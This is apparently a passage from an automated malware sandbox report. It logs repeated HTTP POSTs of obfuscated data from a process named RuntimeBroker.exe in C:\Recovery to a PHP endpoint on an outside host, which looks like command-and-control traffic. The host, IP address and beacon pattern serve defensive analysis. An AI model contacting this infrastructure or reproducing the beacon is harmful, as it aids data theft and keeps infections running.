                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.44974137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:21.939548016 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:22.290970087 CET2512OUTData Raw: 51 55 5b 53 53 58 59 59 5c 58 5a 51 50 5e 58 54 5b 52 5e 5d 55 59 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QU[SSXYY\XZQP^XT[R^]UYZ\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^93>*V!?5%64!')_!%T'5](&&X!#5\(%&[!"^.9
                                                                                                            Nov 12, 2024 00:42:22.505284071 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:22.613277912 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:22 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.44974537.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:24.400985003 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1812
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:24.760230064 CET1812OUTData Raw: 51 53 5b 54 56 59 5c 58 5c 58 5a 51 50 52 58 57 5b 51 5e 5a 55 5e 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[TVY\X\XZQPRXW[Q^ZU^ZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X90!?+)56A3$[!^#=3Z65P0-=](5[ )(%&[!"^.
                                                                                                            Nov 12, 2024 00:42:24.985726118 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:25.058029890 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:24 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 22 0d 2b 03 06 07 36 3c 3b 09 39 3d 3d 0d 25 1e 3c 5b 3c 2b 38 1a 21 3d 20 12 38 30 31 51 37 00 34 5d 24 2a 08 07 23 59 21 18 3c 38 21 5b 05 12 22 05 34 15 30 12 2b 3c 3b 07 3a 0f 0e 03 22 20 2f 16 3a 07 0a 0b 3f 2a 3a 0d 30 3c 29 0a 24 1f 05 03 2f 2e 35 04 2a 2f 0e 09 35 34 2e 55 0b 11 23 19 30 3b 23 56 20 2f 0d 58 26 2d 3b 09 21 13 00 53 26 5c 2b 0e 27 3a 05 13 25 32 3e 10 32 0c 07 07 27 29 39 5e 29 5f 24 00 27 10 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: "+6<;9==%<[<+8!= 801Q74]$*#Y!<8!["40+<;:" /:?*:0<)$/.5*/54.U#0;#V /X&-;!S&\+':%2>2')9^)_$'#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.44974737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:29.033304930 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:29.385356903 CET2512OUTData Raw: 54 53 5b 51 56 5b 59 5d 5c 58 5a 51 50 5e 58 54 5b 50 5e 5f 55 5f 5a 59 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TS[QV[Y]\XZQP^XT[P^_U_ZY__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'.2[>!,5'%'!8<V)#.Z6&0>)>!3"<5&[!"^.9
                                                                                                            Nov 12, 2024 00:42:29.600366116 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:29.672290087 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:29 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.44974837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:30.078450918 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1800
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:30.431654930 CET1800OUTData Raw: 51 54 5e 52 53 5b 59 52 5c 58 5a 51 50 5a 58 5d 5b 54 5e 51 55 58 5a 5e 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT^RS[YR\XZQPZX][T^QUXZ^__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\']-%>8""%$36'>6(3=!]*:#<&[!"^.
                                                                                                            Nov 12, 2024 00:42:30.646241903 CET25INHTTP/1.1 100 Continue


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.2.44974937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:30.323677063 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:30.681833029 CET2512OUTData Raw: 51 53 5b 51 56 5b 59 5a 5c 58 5a 51 50 5c 58 5c 5b 56 5e 58 55 5d 5a 5c 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QS[QV[YZ\XZQP\X\[V^XU]Z\__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_-6[=:"A3(!+')U56;>'=)\*C-!0(%&[!"^.1
                                                                                                            Nov 12, 2024 00:42:30.889199972 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:30.969182968 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:30 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.2.44975037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:31.785517931 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.2.44975237.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:32.402479887 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:32.759845972 CET2512OUTData Raw: 54 50 5b 5e 56 5c 59 5a 5c 58 5a 51 50 5e 58 50 5b 51 5e 5b 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP[^V\YZ\XZQP^XP[Q^[UYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'X.3!=8=6*%% Y!(U)3"(3=>(%"[4=)%&[!"^.9
                                                                                                            Nov 12, 2024 00:42:32.987780094 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:33.070226908 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:32 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.2.44975337.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:33.662520885 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:34.009813070 CET2512OUTData Raw: 54 52 5b 54 53 5b 5c 58 5c 58 5a 51 50 53 58 5c 5b 54 5e 5e 55 5e 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TR[TS[\X\XZQPSX\[T^^U^ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\$.5=9V""C06$Z!?=#6"(5'>)C"X43"+%&[!"^.
                                                                                                            Nov 12, 2024 00:42:34.227639914 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:34.310503006 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:34 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.2.44975437.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:34.528309107 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:34.884875059 CET2512OUTData Raw: 54 50 5e 52 53 5c 59 5b 5c 58 5a 51 50 5b 58 52 5b 54 5e 5a 55 55 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP^RS\Y[\XZQP[XR[T^ZUUZ]__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'_.)1W5)$5<U(358)'&>)#V)](%&[!"^.-
                                                                                                            Nov 12, 2024 00:42:35.096375942 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:35.169240952 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:35 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.2.44975637.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:35.369682074 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.44975737.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:35.710448980 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 1800
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:36.056922913 CET1800OUTData Raw: 54 56 5b 53 53 5c 5c 5d 5c 58 5a 51 50 5a 58 5c 5b 55 5e 5e 55 5c 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TV[SS\\]\XZQPZX\[U^^U\ZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'Y,0!?+!6C$5;68*3="+"3!(%*Y +&[!"^.
                                                                                                            Nov 12, 2024 00:42:36.295454979 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:36.371891975 CET308INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 152
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 02 1e 21 1f 2a 2d 20 00 21 3f 2c 1b 2d 10 00 13 32 09 27 01 2b 16 0a 1a 23 3d 2b 05 38 1d 39 51 22 2e 38 14 33 5c 36 02 34 3f 2d 1a 3f 02 21 5b 05 12 21 5d 22 2b 09 08 3f 3c 38 58 2d 31 27 5a 20 33 20 06 2e 39 0d 19 3d 17 25 54 27 02 03 0a 30 31 30 10 2d 00 3e 5d 2b 11 37 56 22 34 2e 55 0b 11 20 0b 33 16 01 57 22 3f 3f 5b 26 3e 23 0d 36 04 21 08 25 14 2c 56 25 39 23 1e 26 21 00 5a 31 22 3e 15 25 2a 35 5b 3e 3a 3f 12 24 3a 23 51 2d 05 2f 56 03 3d 5b 57
                                                                                                            Data Ascii: !*- !?,-2'+#=+89Q".83\64?-?![!]"+?<8X-1'Z 3 .9=%T'010->]+7V"4.U 3W"??[&>#6!%,V%9#&!Z1">%*5[>:?$:#Q-/V=[W


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.44975837.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:35.872054100 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:36.228596926 CET2512OUTData Raw: 54 50 5e 55 56 59 59 5b 5c 58 5a 51 50 5c 58 52 5b 54 5e 5c 55 59 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: TP^UVYY[\XZQP\XR[T^\UYZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'\.0\=+1T5)$4!^<>3>Z6;63>>*%] =+&[!"^.1
                                                                                                            Nov 12, 2024 00:42:36.456948042 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:36.539707899 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:36 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.44975937.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:36.738367081 CET292OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Nov 12, 2024 00:42:37.088108063 CET2512OUTData Raw: 51 54 5e 51 53 5d 59 5f 5c 58 5a 51 50 58 58 5c 5b 5d 5e 50 55 54 5a 5a 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: QT^QS]Y_\XZQPXX\[]^PUTZZ__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'Y- _>"&B$4^!(*#!8-'.%)&Y4 \+5&[!"^.!
                                                                                                            Nov 12, 2024 00:42:37.324107885 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:37.399935961 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:37 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.44976037.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:37.640408993 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:37.994327068 CET2512OUTData Raw: 54 5f 5b 54 53 5d 59 5c 5c 58 5a 51 50 52 58 52 5b 56 5e 5b 55 59 5a 54 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
                                                                                                            Data Ascii: T_[TS]Y\\XZQPRXR[V^[UYZT__B\WV[S^_RZY[S^[Z[VSZ^_S^[^^ZSVPYRRPPP[\Q]\U\UPF\CRZ]XQ_TZ_S_T_V^Q]ZTTZ]P\WY[YU[^YZ[R^]\XTR^_^\^[]_X]XZ]TX[[\_SCX\[Y^\TWUV]VW][\R]]]^UU\]Q_[[XPZS_Z\YYP[XYWXZS\'^-3"]?;2!&%%7!^#=6X!8%3*5% !^)5&[!"^.
                                                                                                            Nov 12, 2024 00:42:38.225048065 CET25INHTTP/1.1 100 Continue
                                                                                                            Nov 12, 2024 00:42:38.297266006 CET158INHTTP/1.1 200 OK
                                                                                                            Server: nginx
                                                                                                            Date: Mon, 11 Nov 2024 23:42:38 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Content-Length: 4
                                                                                                            Connection: keep-alive
                                                                                                            Data Raw: 30 56 58 5a
                                                                                                            Data Ascii: 0VXZ


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.44976137.44.238.250804076C:\Recovery\RuntimeBroker.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 12, 2024 00:42:38.553230047 CET316OUTPOST /eternallineHttpprocessorwindowsDatalifedleprivatecentral.php HTTP/1.1
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                            Host: 500154cm.n9shteam.in
                                                                                                            Content-Length: 2512
                                                                                                            Expect: 100-continue
                                                                                                            Connection: Keep-Alive
                                                                                                            Nov 12, 2024 00:42:38.900804996 CET2512OUTData Raw: 54 5f 5b 57 56 59 59 5f 5c 58 5a 51 50 5f 58 52 5b 52 5e 5f 55 58 5a 5d 5f 5f 42 5c 57 56 5b 53 5e 5f 52 5a 59 5b 53 5e 5b 5a 5b 56 53 5a 5e 5f 53 5e 5b 5e 5e 5a 53 56 50 59 52 52 50 50 50 5b 5c 51 5d 5c 55 5c 55 50 46 5c 43 52 5a 5d 58 51 5f 54
